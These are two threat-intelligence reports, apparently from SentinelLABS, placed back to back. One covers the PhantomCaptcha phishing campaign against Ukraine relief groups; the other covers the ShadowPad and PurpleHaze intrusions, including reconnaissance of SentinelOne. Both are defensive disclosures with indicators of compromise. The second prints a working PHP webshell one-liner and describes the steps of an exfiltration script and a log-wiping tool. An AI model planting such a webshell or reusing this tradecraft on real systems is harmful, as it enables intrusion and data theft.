SentinelLABS together with Digital Security Lab of Ukraine has uncovered a coordinated spearphishing campaign targeting individual members of the International Red Cross, Norwegian Refugee Council, UNICEF, and other NGOs involved in war relief efforts and Ukrainian regional government administration.
Threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page.
The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.
Despite six months of preparation, the attackers’ infrastructure was only active for a single day, indicating sophisticated planning and strong commitment to operational security.
An additional infrastructure pivot revealed a mobile attack vector with fake applications aimed at collecting geolocation, contacts, media files and other data from compromised Android devices.
Background
Following intelligence shared by research partner Digital Security Lab of Ukraine, SentinelLABS conducted an investigation into a coordinated spearphishing campaign launched on October 8th, 2025, targeting organizations critical to Ukraine’s war relief efforts.
The campaign was initiated through emails that impersonated the Ukrainian President’s Office and contained a weaponized PDF attachment (SHA-256: e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3) embedded with a malicious link.
PDF document page 1/8
Targeted organizations included the International Committee of the Red Cross (ICRC), United Nations Children’s Fund (UNICEF) Ukraine office, Norwegian Refugee Council, Council of Europe’s Register of Damage for Ukraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mikolaevsk regions.
The weaponized PDF was an 8-page document that appeared to be a legitimate governmental communique. VirusTotal submissions on October 8th showed the malicious file uploaded from multiple locations including Ukraine, India, Italy, and Slovakia, suggesting widespread targeting and potential victim interaction with the campaign.
PhantomCaptcha Attack Chain
The PhantomCaptcha campaign employed a sophisticated multi-stage attack chain designed to exploit user trust and bypass traditional security controls.
Opening the weaponized PDF and clicking on the embedded link directed the victim to zoomconference[.]app, a domain masquerading as a legitimate Zoom site but in reality hosting a VPS server located in Finland and owned by Russian provider KVMKA.
Our analysis showed that zoomconference[.]app, hosted on IP 193.233.23[.]81, stopped resolving on the same day the attack attempt took place, indicating a single day operation. However, we were able to retrieve the server response from a record captured on VirusTotal. The server response showed that any visitors to the site encountered a convincing fake Cloudflare DDoS protection gateway.
Initial view of a page from zoomconference[.]app
After loading, the fake Cloudflare page attempts to establish a WebSocket connection to the attackers’ server, passing a randomly generated client identifier, clientId, produced by an embedded JavaScript function generateRandomId(). A JavaScript comment before the function suggests the client identifier should be 32 characters long; however, the code utilizes only 2 characters for clientId.
The attack infrastructure supported two potential infection paths. If the WebSocket server responded with a matching identifier, the victim’s browser would redirect to a legitimate, password-protected Zoom meeting. This infection path likely enabled live social engineering calls with victims; however, activation of this path was not observed during our investigation.
The primary infection vector relied on a variation of a social engineering technique that has been widely deployed by a variety of threat actors since mid-2024. Dubbed ClickFix or Paste and Run, it involves convincing the target to execute commands either deliberately or surreptitiously copied to the user’s clipboard. The PhantomCaptcha variant of this technique works as follows.
After the fake “automatic” verification process, victims are presented with a simulated reCaptcha challenge displaying an “I’m not a robot” checkbox.
Simulated reCaptcha controls
Clicking the checkbox triggers a popup with instructions in Ukrainian, directing users to
Click the “Copy token” button in the popup
Press Windows + R to open the Run dialog
Paste and execute the command
Custom reCaptcha popup in Ukrainian with “Copy token” button
The button runs a function copyToken() which contains a PowerShell commandlet designed to run invisibly.
The code downloads and executes the next stage PowerShell script from hxxps://zoomconference[.]app/cptch/${clientId}, where ${clientId} is the same ID as described above.
This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files.
Infection paths
Our analysis suggests this attack chain has overlaps with recently-reported activity attributed to COLDRIVER, a Russian FSB-linked threat cluster, by several industry peers [1, 2, 3]. We continue to investigate whether this attribution can be confidently extended to the PhantomCaptcha campaign.
Multi-Stage Payload Delivery
Although the malware distribution server at zoomconference[.]app was not available at the time of analysis, we managed to discover additional infrastructure and payloads from malware repositories by querying for files from URLs ending with /cptch.
Our analysis revealed that the PhantomCaptcha campaign aimed to deliver PowerShell malware in three stages.
Stage 1: Obfuscated Downloader
The initial payload (SHA-256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44) was a heavily obfuscated PowerShell script named cptch and exceeding 500KB in size. Despite its apparent complexity, the cptch script’s core functionality is simply to download and execute a second-stage payload from hxxps://bsnowcommunications[.]com/maintenance.
The cptch file is a heavily obfuscated PowerShell script
The entire inflated script can be reduced to a single line:
Using massive obfuscation to obscure simple functionality is likely designed to evade signature-based detection and complicate analysis efforts.
Stage 2: Fingerprinting and Encrypted Comms
The second-stage payload (SHA-256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566) is named maintenance and performs system reconnaissance, collecting:
Computer name
Domain information
Username
Process ID
System UUID (hardware identifier)
This data was XOR-encrypted with the hardcoded key b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l and sent to hxxps://bsnowcommunications[.]com/maintenance/<data> via HTTP GET requests.
Part of the maintenance script and the hardcoded XOR key used for encryption
The script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle SaveNothing as a means of evading forensic analysis.
The server responded with an encrypted payload containing the third and final stage, which was decrypted and executed in memory.
Stage 3: WebSocket-Based Remote Access Trojan
The final payload (SHA-256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23) is a lightweight PowerShell backdoor that connects (and repeatedly reconnects) to a remote WebSocket server at wss://bsnowcommunications[.]com:80. It receives Base64-encoded JSON messages that contain one of:
cmd: a command that is decoded and executed with iex (Invoke-Expression) synchronously; Executing a command with iex (Invoke-Expression)
psh: a PowerShell payload decoded and executed asynchronously using a PowerShell runspace delegate. Executing a PowerShell payload from the server
After execution, the script collects output, the current working directory, the machine HWID (UUID via WMI), PID, and an IDC identifier from the server message, converts that to JSON, and sends it back over the WebSocket. It is designed to run in an infinite loop, with reconnect logic and basic error handling.
The WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an operator arbitrary access to the host.
Infrastructure Analysis
PhantomCaptcha demonstrated a moderate level of operational security through its brief active window. The C2 domain zoomconference[.]app resolved to 193.233.23[.]81, a VPS server hosted by Russian provider KVMKA. SentinelLABS’ analysis revealed the infrastructure was active for only about 24 hours on October 8, 2025, with ports 443 and 80 closed by the time of our investigation.
By fingerprinting the cached server response, we were able to identify a further malicious IP address 45.15.156[.]24, which resolves from goodhillsenterprise[.]com and has previously been seen serving obfuscated PowerShell malware scripts [1, 2]. We assess, with medium confidence, that 45.15.156[.]24 is currently or has recently been under the control of the threat actors behind PhantomCaptcha.
The C2 domain bsnowcommunications[.]com is linked to IP 185.142.33[.]131. Unlike the public-facing lure domain, this backend C2 infrastructure remains active, indicating strong compartmentalization and the need to maintain certain infrastructure for already-compromised systems.
We also found that on October 9, 2025, the day after the initial attack, a domain with the name zoomconference[.]click was registered, potentially indicating plans for continued operations.
PhantomCaptcha 2025 Attack Timeline
March – According to the earliest related event (registration of goodhillsenterprise[.]com), the attackers started their operations on 2025-03-27.
July – A number of malicious PowerShell scripts and other malware samples were developed and tested on VirusTotal in July 2025.
September – SSL certificates from Let’s Encrypt for the related domains were issued on Sep 15 and Sep 25, 2025.
October – Internal timestamps from the lure PDF document are dated back to Aug 2025, but were updated on Oct 8, 2025. The email with malicious attachment was also sent out on Oct 8, 2025. On the same day, the attack domain was shut down only to appear the following day (Oct 9, 2025) under a different top level domain.
Pivot to Additional Campaign
One interesting pivot from our infrastructure analysis revealed a link to a wider campaign making use of adult-oriented social and entertainment lures, with potential links to Russia/Belarus source development.
As noted earlier, the PhantomCaptcha zoom-themed domains were hosted on 193.233.23[.]81. During our analysis, the same IP began hosting a new domain, princess-mens[.]click, which appeared similar in ownership and configuration. Collected HTTPS response data from zoomconference[.]click also began including content identical to that found in the new domain, indicating a direct overlap in ownership of both domains.
Domain timeline, focused on October and later, on 193.233.23[.]81zoomconference[.]click HTTPS response data matching princess-mens[.]click
The princess-mens[.]click domain has been observed linked to an Android application called princess.apk, hosted at https://princess-mens[.]click/princess.apk. The domain’s content and the APK are themed around an adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club. Similar APKs can be found in other themes as well, such as “Cloud Storage”.
App requesting device location
The application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional infrastructure and samples. The samples use the HTTPS protocol and communicate over port 5000 to various server paths such as /check_update, /data, and /upload. For example:
https://[IP ADDRESS]:5000/check_update?version=[APP VERSION NUMBER]
The APK’s collectAndSendAllData() method is designed to gather a wide range of personal and device information. Based on the variable names in the code, the specific data being collected appears to be as follows.
Contacts data
phonebook entries (names, numbers, emails).
Call logs
incoming, outgoing, and missed calls.
Installed apps
list of all installed applications.
SIM numbers/data
SIM card information such as numbers, IMSI, or carrier details.
Device info
hardware model, OS version, manufacturer, and possibly device ID.
Network info
connected network type (Wi-Fi, mobile, etc).
Wi-Fi SSID
name of the currently connected Wi-Fi network.
Location data
GPS or last known location of the device.
Public IP address
external IP visible to the internet.
Gallery images
photos or image metadata stored on the device.
While these findings indicate a possible relation to the PhantomCaptcha campaign, we are currently tracking it as a separate cluster of activity and encourage the research community to further pursue this lead for additional insight. We provide indicators that may be fruitful to explore at the end of this post.
Security Implications
Legitimate services do not require pasting commands into Windows Run dialog (Win+R) or similar interfaces. Hence, user awareness training on “Paste and Run” social engineering techniques can help prevent attacks using this infection vector. Similarly, unexpected communications from government offices can be independently verified through known channels.
From a technical perspective, PowerShell execution logging and monitoring provides visibility into commands using hidden window styles, execution policy bypasses, or attempts to disable command history logging. Additionally, network security teams can monitor for WebSocket connections to recently-registered or suspicious domains, particularly those mimicking legitimate services.
We provide a comprehensive list of Indicators of Compromise below to support threat hunting and detection efforts.
Conclusion
The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control. The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.
The targeting of organizations supporting Ukraine’s relief efforts also reveal an adversary seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts.
SentinelLABS continues to monitor infrastructure associated with this threat actor and will provide updates as new information becomes available.
Acknowledgments
We would like to express our thanks to partners in the region, including Digital Security Lab of Ukraine for their invaluable collaboration on this case.
Organizations that believe they may have been targeted by threat actors involved in this campaign are invited to reach out to the SentinelLABS team via ThreatTips@sentinelone.com.
In October 2024, SentinelLABS observed and countered a reconnaissance operation targeting SentinelOne, which we track as part of a broader activity cluster named PurpleHaze.
At the beginning of 2025, we also identified and helped disrupt an intrusion linked to a wider ShadowPad operation. The affected organization was responsible for managing hardware logistics for SentinelOne employees at the time.
A thorough investigation of SentinelOne’s infrastructure, software, and hardware assets confirmed that the attackers were unsuccessful and SentinelOne was not compromised by any of these activities.
The PurpleHaze and ShadowPad activity clusters span multiple partially related intrusions into different targets occurring between July 2024 and March 2025. The victimology includes a South Asian government entity, a European media organization, and more than 70 organizations across a wide range of sectors.
We attribute the PurpleHaze and ShadowPad activity clusters with high confidence to China-nexus threat actors. We loosely associate some PurpleHaze intrusions with actors that overlap with the suspected Chinese cyberespionage groups publicly reported as APT15 and UNC5174.
This research underscores the persistent threat Chinese cyberespionage actors pose to global industries and public sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity vendors.
Overview
This research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter of 2025. This post expands upon previous SentinelLABS research, which provides an overview of threats against cybersecurity vendors, including SentinelOne, ranging from financially motivated crimeware to targeted attacks by nation-state actors. This research focuses specifically on the subset of threats targeting SentinelOne and others that we attribute to China-nexus threat actors.
By disclosing details of the threat activities we have faced, we bring into focus an aspect of the threat landscape that has received limited attention in public cyber threat intelligence discourse: the targeting of cybersecurity vendors. Our objective is to contribute to strengthening industry defenses by promoting transparency and encouraging collaboration. Cybersecurity companies are high-value targets for threat actors due to their protective roles, deep visibility into client environments, and ability to disrupt adversary operations. The findings detailed in this post highlight the persistent interest of China-nexus actors in these organizations.
This research focuses on the following activities targeting SentinelOne, as well as suspected related operations identified during our investigations:
An intrusion into an IT services and logistics organization, which was responsible at the time for managing hardware logistics for SentinelOne employees.
Extensive remote reconnaissance of SentinelOne servers intentionally reachable from the Internet by virtue of their functionality.
We promptly informed the IT services and logistics organization of the intrusion details. A thorough investigation into SentinelOne’s infrastructure, software, and hardware assets found no evidence of compromise.
At this point, it remains unclear whether the perpetrators’ focus was solely on the targeted IT logistics organization or if they intended to extend their reach to downstream organizations as well. Nevertheless, this case underscores the persistent threat posed by suspected Chinese threat actors, who have a history of seeking to establish strategic footholds to potentially compromise downstream entities.
As for the reconnaissance activity, we promptly identified and mapped the threat actor’s infrastructure involved in this operation as soon as it began. A thorough investigation of SentinelOne servers probed by the attackers revealed no signs of compromise. We assess with high confidence that the threat actor’s activities were limited to mapping and evaluating the availability of select Internet-facing servers, likely in preparation for potential future actions. Continuous monitoring of network traffic to our servers, which is part of established and continuing practice for protecting SentinelOne assets exposed to the Internet, enabled rapid detection and increased scrutiny to the reconnaissance activities, effectively mitigating any potential risks.
Further investigations uncovered multiple, partially related intrusions and clusters of activity characteristic of modern Chinese-nexus operations:
Activity A: June 2024 intrusion into a South Asian government entity
Activity B: A set of intrusions impacting organizations worldwide occurring between July 2024 and March 2025
Activity C: Intrusion into an IT services and logistics company at the beginning of 2025
Activity D: October 2024 intrusion into the same government entity compromised in June 2024
Activity E: October 2024 reconnaissance activity targeting SentinelOne
Activity F: September 2024 intrusion into a leading European media organization
The next two sections provide an overview of these activities, including timelines, points of overlap, and our attribution assessments, followed by concrete technical details, such as observed TTPs, malware, and infrastructure to enable other organizations in related sectors to investigate and mitigate similar sets of activity.
Overview | ShadowPad Intrusions
ShadowPad activity, June 2024 – March 2025
In June 2024, SentinelLABS observed threat actor activity involving the ShadowPad malware targeting a South Asian government entity that provides IT solutions and infrastructure across multiple sectors (Activity A). The ShadowPad sample we retrieved was obfuscated using a variant of ScatterBrain, an evolution of the ScatterBee obfuscation mechanism.
Based on ShadowPad implementation characteristics, we identified additional samples that revealed broader activity taking place between July 2024 and March 2025, spanning a wide range of victims globally (Activity B). Using C2 netflow and SentinelOne telemetry data, SentinelLABS uncovered over 70 victims across sectors such as manufacturing, government, finance, telecommunications, and research. Potentially affected SentinelOne customers were proactively contacted by our Threat Discovery and Response (TDR) teams. One of the impacted entities was an IT services and logistics company, which had been responsible for managing hardware logistics for SentinelOne employees during that period (Activity C).
We attribute these intrusions with high confidence to China-nexus actors, with ongoing efforts aimed at determining the specific threat clusters involved. ShadowPad is a closed-source modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage. Google Threat Intelligence Group has observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters associated with the suspected Chinese APT umbrella actor APT41.
Several of the ShadowPad samples and infrastructure we identified have also been documented in previous public reporting on recent ShadowPad activities, including research published by TrendMicro, Orange Cyberdefense, and Check Point. Some of these activities have included the deployment of ransomware referred to as NailaoLocker, though the motive remains unclear, whether for financial gain or as a means of distraction, misattribution, or removal of evidence.
Overview | The PurpleHaze Activity Cluster
PurpleHaze activity, September – October 2024
In early October 2024, SentinelLABS observed new threat actor activity (Activity D) at the same South Asian government entity compromised using ShadowPad in June 2024 (Activity A).
This intrusion involved backdoors that we classify as part of a malware cluster designated GOREshell, our designation for a loose malware cluster that includes the open-source reverse_ssh backdoor and its custom variants, which we have observed in targeted attacks. While these variants exhibit variations in implementation, all share code similarities with the client component of reverse_ssh.
We track some of the infrastructure used in this intrusion as part of an operational relay box (ORB) network used by several suspected Chinese cyberespionage actors, particularly a threat group that overlaps with public reporting on APT15. The use of ORB networks is a growing trend among Chinese threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging. APT15, also historically referred to as Ke3Chang and Nylon Typhoon, is a suspected Chinese cyberespionage actor known for its global targeting of critical sectors, including telecommunications, information technology, and government organizations.
Further, in October 2024, the same month as the activity targeting the South Asian government entity, SentinelLABS observed remote connections to Internet-facing SentinelOne servers for reconnaissance (Activity E). Based on significant overlaps in infrastructure management, as well as domain creation and naming practices, we associate with high confidence the infrastructure observed in the reconnaissance operation with that used by the threat actor targeting the South Asian government entity (Activity D). This suggests the involvement of the same threat actor, or of a third-party entity responsible for managing infrastructure for multiple threat groups, a common practice in the Chinese cyberespionage landscape.
In late September 2024, a few weeks before the October activities, SentinelLABS observed an intrusion into a leading European media organization (Activity F). Our investigation revealed overlaps in the tools used during this intrusion and the October 2024 activity targeting the South Asian government entity (Activity D). This includes the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice (THC), a community of cybersecurity researchers.
Activity D and Activity F are the first instances in which we have observed THC tooling used in the context of APT activities.
We attribute Activity F with high confidence to a China-nexus actor, loosely associating it with a suspected Chinese initial access broker tracked as UNC5174 by Mandiant. We acknowledge the possibility that post-intrusion activities may have been conducted by a different threat group.
The threat actor leveraged ORB network infrastructure, which we assess to be operated from China, and exploited the CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before the vulnerabilities were publicly disclosed. This intrusion method suggests the involvement of UNC5174, which is assessed to be a contractor for China’s Ministry of State Security (MSS) primarily focusing on gaining access and specializing in exploiting vulnerabilities in targeted systems. After compromising these systems, UNC5174 is suspected of transferring access to other threat actors.
In January 2025, CISA and the FBI released a joint advisory reporting threat actor activities that also took place in September 2024, involving the chained exploitation of CVE-2024-8963 and CVE-2024-8190, without providing specific attribution assessments. In March 2025, the French Cybersecurity Agency (ANSSI) released its 2024 cyber threat overview report, which documents intrusions that occurred in September 2024, involved the same vulnerabilities, and show overlaps in TTPs associated with UNC5174.
Additionally, Mandiant has observed UNC5174 exploiting the CVE-2023-46747 and CVE-2024-1709 vulnerabilities and deploying a publicly available backdoor tracked as GOREVERSE. Strings and code segments in the public GOREVERSE YARA rule provided by Mandiant match the reverse_ssh backdoor, placing GOREVERSE in the GOREshell malware cluster, samples of which we observed in both this intrusion and the October 2024 activity targeting the South Asian government entity.
We collectively track Activity D, E and F as the PurpleHaze threat cluster. While we attribute PurpleHaze with high confidence to China-nexus threat actors, investigations continue to determine the specific threat groups behind the activities and their potential links to the June 2024 and later ShadowPad intrusions (Activity A, B, and C).
We do not rule out the involvement of distinct threat groups or the possibility of multiple intrusions conducted by the same threat actor, especially given the widespread use of publicly available tools and the extensive sharing of malware, infrastructure, and operational practices among Chinese threat groups. We also consider the possibility that access may have been transferred between different actors, particularly in light of the suspected involvement of UNC5174.
Technical Details | ShadowPad Intrusions
We present below technical details on the ShadowPad intrusion into the South Asian government entity in June 2024 (Activity A), as well as on the broader ShadowPad activities that took place between July 2024 and March 2025 (Activity B and C).
Activity A | ShadowPad and ScatterBrain Obfuscation
This intrusion involved the deployment of a ShadowPad sample named AppSov.exe. The threat actor deployed AppSov.exe by executing a PowerShell command that performs the following actions:
Downloads a file named x.dat from a remote endpoint using curl.exe after a 60-second delay.
Saves the downloaded file as AppSov.exe in the C:\ProgramData\ directory.
Launches the executable using the Start-Process PowerShell command.
The endpoint hosting x.dat was a previously compromised system within the same organization. Our analysis revealed that malware artifacts had been deployed on this system approximately one month prior to the ShadowPad deployment. These include the agent component of the Nimbo-C2 open-source remote access framework, as well as a PowerShell script that performs the following actions:
Collects sensitive user data (documents, credentials, and cryptographic material) by recursively searching C:\Users\ for files modified in the previous 600 days and with the following extensions: *.xls, *.xlsx, *.ods, *.txt, *.pem, *.cert, and *.pfx.
Copies the collected files to a temporary folder at C:\windows\vss\temp.
Archives the collected files into an archive file named with the system’s MAC address and date, likely for tracking compromised endpoints.
Encrypts and password-protects the archive using 7-Zip with the password @WsxCFt6&UJMmko0, ensuring the data is obfuscated from inspection.
Exfiltrates the encrypted archive via a curl POST request to a hardcoded URL: https[://]45.13.199[.]209/rss/rss.php.
Removes traces by deleting the temporary folder, archive, and DAT files after exfiltration to avoid detection and forensic recovery.
PowerShell exfiltration script
The Nimbo-C2 agent was deployed to C:\ProgramData\Prefetch\PfSvc.exe, likely masquerading as a Privacyware Privatefirewall executable.
We have not previously observed the use of Nimbo-C2 or variants of the PowerShell exfiltration script in the context of suspected Chinese APT activity. Previous research has documented the use of Nimbo-C2 in operations attributed to APT-K-47 (also known as Mysterious Elephant), a threat actor believed to originate from South Asia.
The deployment of the ShadowPad sample AppSov.exe raises several possibilities:
the same threat actor conducted both the earlier activity and the ShadowPad deployment,
access was handed off to, or leveraged by, a second actor, or
two distinct actors operated independently within the same environment.
AppSov.exe was obfuscated using a variant of ScatterBrain. The malware uses the domain news.imaginerjp[.]com and the IP address 65.38.120[.]110 for C2 communication, leveraging DNS over HTTPS (DoH) in an attempt to evade detection by Base-64 encoding queried domains and obscuring DNS traffic from monitoring systems.
AppSov.exe is obfuscated using dispatcher routines that alter control flow, displacements placed after each invocation of these routines, and opaque predicates. The malware verifies its integrity using the constant values 0x89D17427, 0x254733D6, 0x6FE2CF4E, and 0x110302D6. It is distributed with three modules: one with the ID 0x0A and two with the ID 0x20. The ShadowPad module IDs designate different types of modules, including configuration data or code that implements malware functionalities such as injection or data theft.
AppSov.exe: ShadowPad module IDs and sizes AppSov.exe: Deobfuscated dispatcher routine
For a detailed overview of the ScatterBrain obfuscation mechanism and additional ShadowPad implementation details, we refer to previous research by Google Threat Intelligence Group.
Activity B & C | A Global ShadowPad Operation
Based on various implementation overlaps with AppSov.exe, including configuration data as well as custom decryption and integrity verification constant values, we identified multiple additional ShadowPad samples obfuscated using ScatterBee variants. This also led to the discovery of related infrastructure, including the ShadowPad C2 servers dscriy.chtq[.]net and updata.dsqurey[.]com, as well as the suspected ShadowPad-related domains network.oossafe[.]com and notes.oossafe[.]com.
Deobfuscated integrity verification routine in AppSov.exe Deobfuscated integrity verification routine in another ShadowPad sample
Some of the samples we identified differ in execution from AppSov.exe. Instead of embedding the full ShadowPad functionality and configuration within a single executable, they are implemented as Windows DLLs designed to be loaded by specific legitimate executables vulnerable to DLL hijacking. These DLLs then load an external file with an eight-character name and the .tmp extension, for example 1D017DF2.tmp.
Using C2 netflow and SentinelOne telemetry data, we identified a broad range of victim organizations compromised by the ShadowPad samples we discovered. Between July 2024 and March 2025, this malware was involved in intrusions at over 70 organizations across multiple regions globally, spanning sectors such as manufacturing, government, finance, telecommunications, and research. Among the victims was the IT services and logistics company that was managing hardware logistics for SentinelOne employees at the time (Activity C).
Geographical distribution of victims
We suspect that the most common initial access vector involved the exploitation of Check Point gateway devices, consistent with previous research on this topic. We also observed communication to ShadowPad C2 servers originating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential exploitation of these systems as well.
Technical Details | PurpleHaze
We present below technical details on intrusions that are part of the PurpleHaze threat cluster: the intrusion into the South Asian government entity in October 2024 (Activity D, the same organization compromised using ShadowPad in June 2024), the reconnaissance of SentinelOne infrastructure in October 2024 (Activity E), and the intrusion into the European media organization in September 2024 (Activity F).
Activity D | GOREshell & a China-based ORB Network
In early October 2024, we detected system reconnaissance and malware deployment activities on a workstation within the South Asian government entity. The threat actor executed the ipconfig Windows command to query network configuration and established a connection to IP address 103.248.61[.]36 on port 443. The adversary then created the C:\Program Files\VMware\VGAuth directory and downloaded an archive file named VGAuth1.zip from 103.248.61[.]36; after extracting its contents into the VGAuth directory, the archive was deleted.
The archive file contained two executables: a legitimate VGAuthService.exe executable and a malicious DLL file named glib-2.0.dll (original filename: libglib-2.0-0.dll), which masquerades as a legitimate GLib–2.0 library file.
VGAuthService.exe implements the VMware Guest Authentication Service. The threat actor deployed version 11.3.5.59284, signed by VMWare and compiled on Tuesday, August 31, 2021, 06:14:07 UTC. This version is vulnerable to DLL hijacking.
The threat actor then created a new Windows service named VGAuthService, which automatically starts upon system boot, runs the VGAuthService.exe executable, and displays as Alias Manager and Ticket Service. When the service was started, VGAuthService.exe loaded and executed the malicious glib-2.0.dll library file.
glib-2.0.dll implements the GOREshell backdoor, which uses reverse_ssh functionalities to establish SSH connections to attacker-controlled endpoints. The backdoor is implemented in the Go programming language and obfuscated using Garble, including string literals, package paths, and function names. It uses the cgo library to invoke C code.
glib-2.0.dll: Obfuscated form of the string Fail to detect service: %v
glib-2.0.dll contains a private SSH key used for establishing SSH connections to the threat actor’s C2 server.
The malware was configured to use downloads.trendav[.]vip for C2 purposes. This domain resolved to 142.93.214[.]219 at the time of the activity. glib-2.0.dll establishes SSH connections over the Websocket protocol (wss[://]downloads.trendav[.]vip:443).
Network request issued by glib-2.0.dll
The threat actor deployed GOREshell variants not only on Windows systems but also on Linux. This includes two samples: one masquerading as the snapd Linux service and the other as the update-notifier service. The threat actor deployed both samples as Linux services, which included creating service configuration files, such as /usr/lib/systemd/system/update-notifier.service.
The content of update-notifier.service
In contrast to update-notifier, which is obfuscated using Garble and packed with UPX, snapd is not obfuscated. Both samples use epp.navy[.]ddns[.]info as their C2 servers and are configured to proxy connections through a local IP address over port 8080. Additionally, both samples store the same private SSH key as glib-2.0.dll.
Based on the private key stored in glib-2.0.dll, snapd, and update-notifier, we discovered an additional GOREshell variant, which was uploaded on a malware sharing platform in September 2023. This GOREshell variant is implemented as a tapisrv.dll library file (Microsoft Windows Telephony Server) and loaded as a Windows service by the svchost.exe service container process. The malware uses the mail.ccna[.]organiccrap[.]com domain for C2 purposes.
The discovery of the tapisrv.dll sample indicates reuse of the private key in intrusions separated by a considerable period.
Private key reuse
We associate some of the GOREshell C2 infrastructure with an ORB network, which we track as being operated from China and actively used by several suspected Chinese cyberespionage actors, including overlaps with APT15.
The threat actor made significant efforts to obscure their activity and remove evidence of their presence, including timestomping GOREshell executable files and deploying a log removal tool on Linux systems, specifically at the /usr/sbin/mcl filepath.
Our analysis of mcl suggests that the executable is likely a compiled and modified version of the source code of a tool called clear13, developed by members of The Hacker’s Choice community. The source code of clear13 is publicly available on GitHub.
The mcl executable is packed using a custom-modified version of UPX. The tool supports four commands, which are presented to the user through a help menu.
Command
Displayed help text
Description
sudo
sudo cmd
Executes a specified command (cmd) with elevated privileges using sudo.
clear
clear name
Removes the last entry containing a specified username (name) from /var/log/wtmp, /var/run/utmp, and /var/log/lastlog.
secure
secure timeString
Removes all entries matching a specified pattern (timeString) from /var/log/secure.
history
history leftNum
Truncates the user command history, keeping only a specified number of entries (leftNum).
Activity E | Probing & Reconnaissance of SentinelOne Infrastructure
In October 2024, SentinelLABS observed consistent attempts to establish remote connections to multiple Internet-facing SentinelOne servers over port 443 for reconnaissance purposes.
Our analysis of the infrastructure associated with this activity revealed links to the October 2024 intrusion into the South Asian government entity (Activity D).
We identified server characteristics and domain registration patterns suggesting coordinated infrastructure management and bulk domain registration, likely carried out by the same threat actor conducting reconnaissance on SentinelOne infrastructure and involved in Activity D, or by a third-party entity responsible for managing the infrastructure used in both activities.
The connections we initially observed originated from a virtual private server (VPS) that used a C2 server as a proxy. At the time of the activity, the server had an IP address of 128.199.124[.]136, which was mapped to the domain name tatacom.duckdns[.]org and is designed to appear as part of a major South Asian telecommunications provider’s infrastructure.
Based on a unique server fingerprint, SentinelLABS discovered an extensive collection of related network infrastructure.
Infrastructure overview
The C2 domain downloads.trendav[.]vip, observed in Activity D, resolved to the IP address 142.93.214[.]219. We also identified this IP address based on the server fingerprint. Furthermore, the IP address of a server associated with the same fingerprint, 143.244.137[.]54, was mapped to the domain name cloud.trendav[.]co in October 2024. This domain name overlaps with downloads.trendav[.]vip.
Additionally, historical domain registration records show that the root domain trendav[.]vip was originally registered through Dynadot Inc., on 24 October 2023, at 13:05:29 UTC. Identifying all domains registered through the same registrar at the exact same date and time (to the second) reveals the domains secmailbox[.]us and sentinelxdr[.]us, the latter of which likely masquerades as SentinelOne infrastructure.
Between February and April 2025, the sentinelxdr[.]us domain resolved to 142.93.214[.]219, the same IP address that downloads.trendav[.]vip resolved to in October 2024.
In October 2024, mail.secmailbox[.]us resolved to 142.93.212[.]42. Like the server at IP address 142.93.214[.]219 (downloads.trendav[.]vip/sentinelxdr[.]us), this server shared the same server fingerprint.
Furthermore, domain registration data for sentinelxdr[.]us was updated on 25 September 2024, at 01:43:46 UTC, a date and time that is identical to an update of the registration data of trendav[.]vip.
Activity F | The Return of dsniff
The late September 2024 intrusion into the European media organization showed overlaps in tooling with the October 2024 intrusion into the South Asian government entity (Activity D). These overlaps include the use of the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice community.
The threat actor deployed a UPX-packed GOREshell sample, which was configured to use 107.173.111[.]26 over the WebSocket protocol for C2 communication (wss[://]107.173.111[.]26:443). The executable file we retrieved contains a private SSH key and the public SSH key fingerprint f0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590.
Based on the fingerprint, we identified a Garble-obfuscated GOREshell sample that was uploaded to a malware sharing platform from Iran in late July 2024. This GOREshell sample also contains a private SSH key and is configured to use the same C2 server, 107.173.111[.]26, over the TLS protocol (tls[://]107.173.111[.]26:80).
This suggests threat actor activity since at least July 2024, possibly targeting organizations in both Europe and the Middle East.
The threat actor also deployed version 2.5a1 of dsniff, a collection of tools for network auditing and penetration testing. With active development of dsniff having been discontinued for over 15 years, our investigation of public source code repositories revealed that the THC community has released version 2.5a1 in an effort to resume active maintenance of the project.
To obfuscate their presence, the threat actor timestomped deployed executables, setting their creation date to September 15, 2021. After gaining initial access to the environment, the perpetrators deployed a simple PHP webshell that enables remote command execution by passing commands via the a parameter and executing them with elevated privileges using sudo.
<?php system('/bin/sudo '. @$_REQUEST['a']);?>
Our investigation of system and network traffic artifacts strongly suggests that the threat actor gained an initial foothold by exploiting CVE-2024-8963 in conjunction with CVE-2024-8190 (both Ivanti Cloud Services Appliance vulnerabilities) on September 5, 2024, a few days before their public disclosure.
